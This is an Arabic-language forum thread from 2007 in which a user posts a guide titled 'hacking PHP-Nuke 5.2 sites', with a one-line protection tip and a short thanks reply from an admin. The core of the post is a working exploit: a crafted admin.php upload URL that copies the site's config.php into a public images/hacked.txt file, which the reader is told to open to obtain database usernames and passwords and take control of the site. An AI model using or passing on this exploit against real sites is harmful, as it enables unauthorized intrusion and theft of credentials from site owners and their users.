إختراق مواقع Php nuke الإصدار الأخير 5.2

اذهب الى الأسفل

إختراق مواقع Php nuke الإصدار الأخير 5.2

مُساهمة من طرف black-hand في الخميس يونيو 28, 2007 10:16 am

إختراق مواقع Php nuke الإصدار الأخير 5.2



طريقة حماية الموقع :

من نفس موقع php nuke توجد تحديثات للاخطاء البرمجية وتسمى (Fixed) في نفس الموقع تحاول انك تتابع الأخطاء المكتشفة وسد الثغرات أول بأول وإلا سوف يكون موقعك (مرتع للبرطاعة) كما يقولون في الزنتان.


موقع الشركة المصنعه
http://www.phpnuke.org/

طريقة الاختراق :
تعتمد طريقة اختراق هذه المواقع عن طريق ثغرات تسمى (exploit) و هي ناتجة عن أخطاء في البرمجة و يتم إستغلالها في الدخول للموقع و التلاعب به

تعتمد طريقة اختراق المواقع المصممة بـ php nuke على ثغرة تمكنك من نسخ ملف config.php

وأخد مايحتويه من معلومات أسم المستخدم و كلمة المرور و المضيف و قاعدة البيانات و غيره

،وبعد نسخ هذي المعلومات تنشئ مستند نص من خلاله تجد كل معلومات الموقع في يدك

) الثغرة Exploit):
أولا قم بوضع الرابط في متصفحك
http://www.example.net/admin.php?upload=1 &file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php &userfile_name=hacked.txt


ملاحظة : ضع الموقع المراد اختراقه في مكان

http://www.example.net/

للتحكم في فتح الملف المنشاء قم بوضع هذا الرابط في متصفحك
http://www.example.net/images/hacked.txt
بعدها تقوم التغرة بإنشاء مستند نص باسم hacked.txt داخل مجلد الصور images

بعدها يفتح لك مستند نص فيه معلومات الموقع ومن هنا تقدر تدخل على الداتا بيس وتتحكم في الموقع
كيف ما تبي


ارجوا عدم استغلال هذه الثغرة ضد إخواننا المسلمين .... وجزأكم الله كل الخير


_________________
nothing will remain


avatar
black-hand
مـــــشرف
مـــــشرف

ذكر عدد الرسائل : 97
العمر : 30
الموقع : عضو مميز بالمنتديات الترفيهية
تاريخ التسجيل : 13/06/2007

معاينة صفحة البيانات الشخصي للعضو http://www.nothing-will-remain.skyblog.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: إختراق مواقع Php nuke الإصدار الأخير 5.2

مُساهمة من طرف Admin في الإثنين أغسطس 20, 2007 6:00 am

شكراا لك أخي

_________________

..:: منتدى منظمة الكوارث المغربي ::..
..:: منتدى الكوارث المغربي ::..

avatar
Admin
Admin
Admin

ذكر عدد الرسائل : 173
العمر : 27
الموقع : مدير و موسس المنظمة
تاريخ التسجيل : 12/06/2007

معاينة صفحة البيانات الشخصي للعضو http://disaster-world.c.la

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى